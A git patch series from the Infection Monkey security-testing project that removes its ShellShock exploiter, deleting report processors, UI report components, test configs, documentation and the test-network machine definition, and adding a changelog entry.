@@ -295,23 +294,6 @@ class AWSExporter(Exporter): instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) - @staticmethod - def _handle_shellshock_issue(issue, instance_arn): - - return AWSExporter._build_generic_finding( - severity=10, - title="Machines are vulnerable to 'Shellshock'", - description="Update your Bash to a ShellShock-patched version.", - recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on " - "TCP port {2} was vulnerable to a " - "shell injection attack on the paths: {3}.".format( - issue["machine"], issue["ip_address"], issue["port"], issue["paths"] - ), - instance_arn=instance_arn, - instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, - ) - @staticmethod def _handle_smb_password_issue(issue, instance_arn): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 1555b4b61..91855329e 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -11,9 +11,6 @@ from monkey_island.cc.services.reporting.issue_processing.exploit_processing.pro from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.log4shell import ( # noqa: E501 Log4ShellProcessor, ) -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( # noqa: E501 - ShellShockExploitProcessor, -) from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( # noqa: E501 ZerologonExploitProcessor, ) 
@@ -34,9 +31,6 @@ class ExploiterDescriptorEnum(Enum): ELASTIC = ExploiterDescriptor( "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor ) - SHELLSHOCK = ExploiterDescriptor( - "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor - ) STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) WEBLOGIC = ExploiterDescriptor( "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py deleted file mode 100644 index bd047fbf5..000000000 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py +++ /dev/null @@ -1,15 +0,0 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( # noqa: E501 - ExploiterReportInfo, - ExploitProcessor, -) - - -class ShellShockExploitProcessor: - @staticmethod - def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: - exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - - urls = exploit_dict["data"]["info"]["vulnerable_urls"] - exploit_info.port = urls[0].split(":")[2].split("/")[0] - exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls] - return exploit_info diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index 270db721a..a923d01f2 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js 
@@ -28,7 +28,6 @@ import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIs
 import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
 import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
 import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
-import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
 import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
 import {
   crossSegmentIssueOverview,
@@ -125,11 +124,6 @@ class ReportPageComponent extends AuthComponent {
         [this.issueContentTypes.REPORT]: elasticIssueReport,
         [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
       },
-      'ShellShockExploiter': {
-        [this.issueContentTypes.OVERVIEW]: shellShockIssueOverview,
-        [this.issueContentTypes.REPORT]: shellShockIssueReport,
-        [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
-      },
       'PowerShellExploiter': {
         [this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
         [this.issueContentTypes.REPORT]: powershellIssueReport,
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js
deleted file mode 100644
index b2496fb21..000000000
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js
+++ /dev/null
@@ -1,30 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-
-export function shellShockIssueOverview() {
-  return (
  • Machines are vulnerable to ‘Shellshock’ (CVE-2014-6271). -
  • ) -} - - -function getShellshockPathListBadges(paths) { - return paths.map(path => {path}); -} - -export function shellShockIssueReport(issue) { - return ( - <> - Update your Bash to a ShellShock-patched version. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a ShellShock attack. -
    - The attack was made possible because the HTTP server running on TCP port {issue.port} was vulnerable to a shell injection attack on the - paths: {getShellshockPathListBadges(issue.paths)}. -
    - - ); -}
From 291755e5c9eb66605f2294d09b096438530bbee6 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:29:33 +0100
Subject: [PATCH 3/7] UT: Remove ShellShock from tests config

---
 monkey/tests/data_for_tests/monkey_configs/flat_config.json | 1 -
 .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 -
 monkey/tests/unit_tests/monkey_island/cc/services/test_config.py | 1 -
 3 files changed, 3 deletions(-)

diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
index 4fdc49340..b4ec2c46c 100644
--- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
@@ -52,7 +52,6 @@
     "SmbExploiter",
     "WmiExploiter",
     "SSHExploiter",
-    "ShellShockExploiter",
     "ElasticGroovyExploiter",
     "Struts2Exploiter",
     "ZerologonExploiter",
diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
index 8080b27cf..33944c305 100644
--- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@@ -5,7 +5,6 @@
     "SmbExploiter",
     "WmiExploiter",
     "SSHExploiter",
-    "ShellShockExploiter",
     "ElasticGroovyExploiter",
     "Struts2Exploiter",
     "WebLogicExploiter",
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
index 9bc86bb7f..58e762036 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
@@ -187,7 +187,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
 {"name": "DrupalExploiter", "options": {}},
 {"name": "ElasticGroovyExploiter", "options": {}},
 {"name": "HadoopExploiter", "options": {}},
- {"name": "ShellShockExploiter", "options": {}},
 {"name": "Struts2Exploiter", "options": {}},
 {"name": "WebLogicExploiter", "options": {}},
 {"name": "ZerologonExploiter", "options": {}},
From fe3b26339835fb4da32d3cf452643cf3aad35434 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:30:01 +0100
Subject: [PATCH 4/7] Docs: Remove ShellShock documentation
---
 docs/content/development/_index.md | 2 +-
 docs/content/reference/exploiters/shellshock.md | 11 -----------
 2 files changed, 1 insertion(+), 12 deletions(-)
 delete mode 100644 docs/content/reference/exploiters/shellshock.md
diff --git a/docs/content/development/_index.md b/docs/content/development/_index.md
index 37a5978e7..85b15adcb 100644
--- a/docs/content/development/_index.md
+++ b/docs/content/development/_index.md
@@ -26,7 +26,7 @@ You can take a look at [our roadmap](https://github.com/guardicore/monkey/projec
 The best way to find weak spots in a network is by attacking it. The [*Adding Exploits*](./adding-exploits/) page will help you add exploits.
-It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Shellshock.
+It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Hadoop.
 ### Analysis plugins 🔬
diff --git a/docs/content/reference/exploiters/shellshock.md b/docs/content/reference/exploiters/shellshock.md
deleted file mode 100644
index 20aee282f..000000000
--- a/docs/content/reference/exploiters/shellshock.md
+++ /dev/null
@@ -1,11 +0,0 @@
----
-title: "ShellShock"
-date: 2020-07-14T08:41:32+03:00
-draft: false
-tags: ["exploit", "linux"]
----
-### Description
-
-This exploit, CVE-2014-6271, is based on the [logic in NCC group's GitHub](https://github.com/nccgroup/shocker/blob/master/shocker.py).
-
-> In GNU Bash (through 4.3), processes trailing strings after function definitions in the values of environment variables allow remote attackers to execute arbitrary code via a crafted environment. This is demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution, AKA "ShellShock."
From ddc77e6d6a1e6e33d791df77389f6f370ebb7bf7 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:30:46 +0100
Subject: [PATCH 5/7] Zoo: Remove ShellShock Exploiter
---
 .../blackbox/config_templates/performance.py | 1 -
 .../blackbox/config_templates/shellshock.py | 17 ----------
 .../blackbox/gcp_test_machine_list.py | 1 -
 envs/monkey_zoo/blackbox/test_blackbox.py | 4 ---
 .../utils/config_generation_script.py | 2 --
 envs/monkey_zoo/docs/fullDocs.md | 33 -------------------
 envs/monkey_zoo/terraform/images.tf | 5 ---
 envs/monkey_zoo/terraform/monkey_zoo.tf | 15 ---------
 8 files changed, 78 deletions(-)
 delete mode 100644 envs/monkey_zoo/blackbox/config_templates/shellshock.py
diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py
index eafa82d28..6108664a7 100644
--- a/envs/monkey_zoo/blackbox/config_templates/performance.py
+++ b/envs/monkey_zoo/blackbox/config_templates/performance.py
@@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
 "SmbExploiter",
 "WmiExploiter",
 "SSHExploiter",
- "ShellShockExploiter",
 "ElasticGroovyExploiter",
 "Struts2Exploiter",
 "WebLogicExploiter",
diff --git a/envs/monkey_zoo/blackbox/config_templates/shellshock.py b/envs/monkey_zoo/blackbox/config_templates/shellshock.py
deleted file mode 100644
index b3620e5b9..000000000
--- a/envs/monkey_zoo/blackbox/config_templates/shellshock.py
+++ /dev/null
@@ -1,17 +0,0 @@
-from copy import copy
-
-from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
-from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
-
-
-class ShellShock(ConfigTemplate):
- config_values = copy(BaseTemplate.config_values)
-
- config_values.update(
- {
- "basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
- "basic_network.scope.subnet_scan_list": ["10.2.2.8"],
- "internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
- "internal.network.tcp_scanner.tcp_target_ports": [],
- }
- )
diff --git a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
index a4dc02447..eadbd6213 100644
--- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
+++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
@@ -17,7 +17,6 @@ GCP_TEST_MACHINE_LIST = {
 "tunneling-12",
 "weblogic-18",
 "weblogic-19",
- "shellshock-8",
 "zerologon-25",
 "drupal-28",
 ],
diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py
index e6e64d3cc..2db234ed2 100644
--- a/envs/monkey_zoo/blackbox/test_blackbox.py
+++ b/envs/monkey_zoo/blackbox/test_blackbox.py
@@ -20,7 +20,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
 from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse import (
 PowerShellCredentialsReuse,
 )
-from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
 from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
 from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
 from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@@ -200,9 +199,6 @@ class TestMonkeyBlackbox:
 def test_weblogic_exploiter(self, island_client):
 TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
- def test_shellshock_exploiter(self, island_client):
- TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellshock_exploiter")
-
 def test_log4j_solr_exploiter(self, island_client):
 TestMonkeyBlackbox.run_exploitation_test(
 island_client, Log4jSolr, "Log4Shell_Solr_exploiter"
diff --git a/envs/monkey_zoo/blackbox/utils/config_generation_script.py b/envs/monkey_zoo/blackbox/utils/config_generation_script.py
index 305d71658..3f787870d 100644
--- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py
+++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py
@@ -12,7 +12,6 @@ from envs.monkey_zoo.blackbox.config_templates.log4j_tomcat import Log4jTomcat
 from envs.monkey_zoo.blackbox.config_templates.mssql import Mssql
 from envs.monkey_zoo.blackbox.config_templates.performance import Performance
 from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
-from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
 from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
 from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
 from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
 Mssql,
 Performance,
 PowerShell,
- ShellShock,
 SmbMimikatz,
 SmbPth,
 Ssh,
diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 682e82fcf..0381eae34 100644
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -11,7 +11,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
 [Nr. 3 Hadoop](#_Toc526517183)
    [Nr. 4 Elastic](#_Toc526517184)
    [Nr. 5 Elastic](#_Toc526517185)
    -[Nr. 8 Shellshock](#_Toc536021461)
    [Nr. 9 Tunneling M1](#_Toc536021462)
    [Nr. 10 Tunneling M2](#_Toc536021463)
    [Nr. 11 SSH key steal](#_Toc526517190)
    @@ -326,38 +325,6 @@ Update all requirements using deployment script:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 8 Shellshock

    -

    (10.2.2.8)

    (Vulnerable)
    OS:Ubuntu 12.04 LTS x64
    Software:Apache2, bash 4.2.
    Default server’s port:80
    Scan results:Machine exploited using Shellshock exploiter
    Notes:Vulnerable app is under /cgi-bin/test.cgi
-
diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf
index a3e2bcb73..23632514a 100644
--- a/envs/monkey_zoo/terraform/images.tf
+++ b/envs/monkey_zoo/terraform/images.tf
@@ -15,11 +15,6 @@ data "google_compute_image" "elastic-5" {
 name = "elastic-5"
 project = local.monkeyzoo_project
 }
-
-data "google_compute_image" "shellshock-8" {
- name = "shellshock-8"
- project = local.monkeyzoo_project
-}
 data "google_compute_image" "tunneling-9" {
 name = "tunneling-9"
 project = local.monkeyzoo_project
diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf
index a53c59007..eff0a44e5 100644
--- a/envs/monkey_zoo/terraform/monkey_zoo.tf
+++ b/envs/monkey_zoo/terraform/monkey_zoo.tf
@@ -106,21 +106,6 @@ resource "google_compute_instance_from_template" "elastic-5" {
 }
 }
-resource "google_compute_instance_from_template" "shellshock-8" {
- name = "${local.resource_prefix}shellshock-8"
- source_instance_template = local.default_ubuntu
- boot_disk{
- initialize_params {
- image = data.google_compute_image.shellshock-8.self_link
- }
- auto_delete = true
- }
- network_interface {
- subnetwork="${local.resource_prefix}monkeyzoo-main"
- network_ip="10.2.2.8"
- }
-}
-
 resource "google_compute_instance_from_template" "tunneling-9" {
 name = "${local.resource_prefix}tunneling-9"
 source_instance_template = local.default_ubuntu
From d8e203dd5052408c0b427ce372bc533f735ef9a3 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Wed, 23 Feb 2022 13:39:36 +0100
Subject: [PATCH 6/7] Project: Change readme and remove shellshock from vulture
---
 README.md | 2 +-
 vulture_allowlist.py | 1 -
 2 files changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 6100219df..7342c49a7 100644
--- a/README.md
+++ b/README.md
@@ -46,7 +46,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
 * SSH
 * SMB
 * WMI
- * Shellshock
+ * Log4Shell
 * Elastic Search (CVE-2015-1427)
 * Weblogic server
 * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
diff --git a/vulture_allowlist.py b/vulture_allowlist.py
index dde79f032..655590dcf 100644
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@@ -57,7 +57,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
 SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
 SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
 ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
-SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
 STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
 WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
 HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
From 55c3236d8e900844755100ffbf058efda3ba2ccd Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Wed, 23 Feb 2022 10:19:27 -0500
Subject: [PATCH 7/7] Changelog: Remove ShellShock exploiter
---
 CHANGELOG.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index f1796d1e3..97017beb5 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -45,6 +45,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - MS08-067 (Conficker) exploiter. #1677
 - Agent bootloader. #1676
 - Zero Trust integration with ScoutSuite. #1669
+- ShellShock exploiter. #1733
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545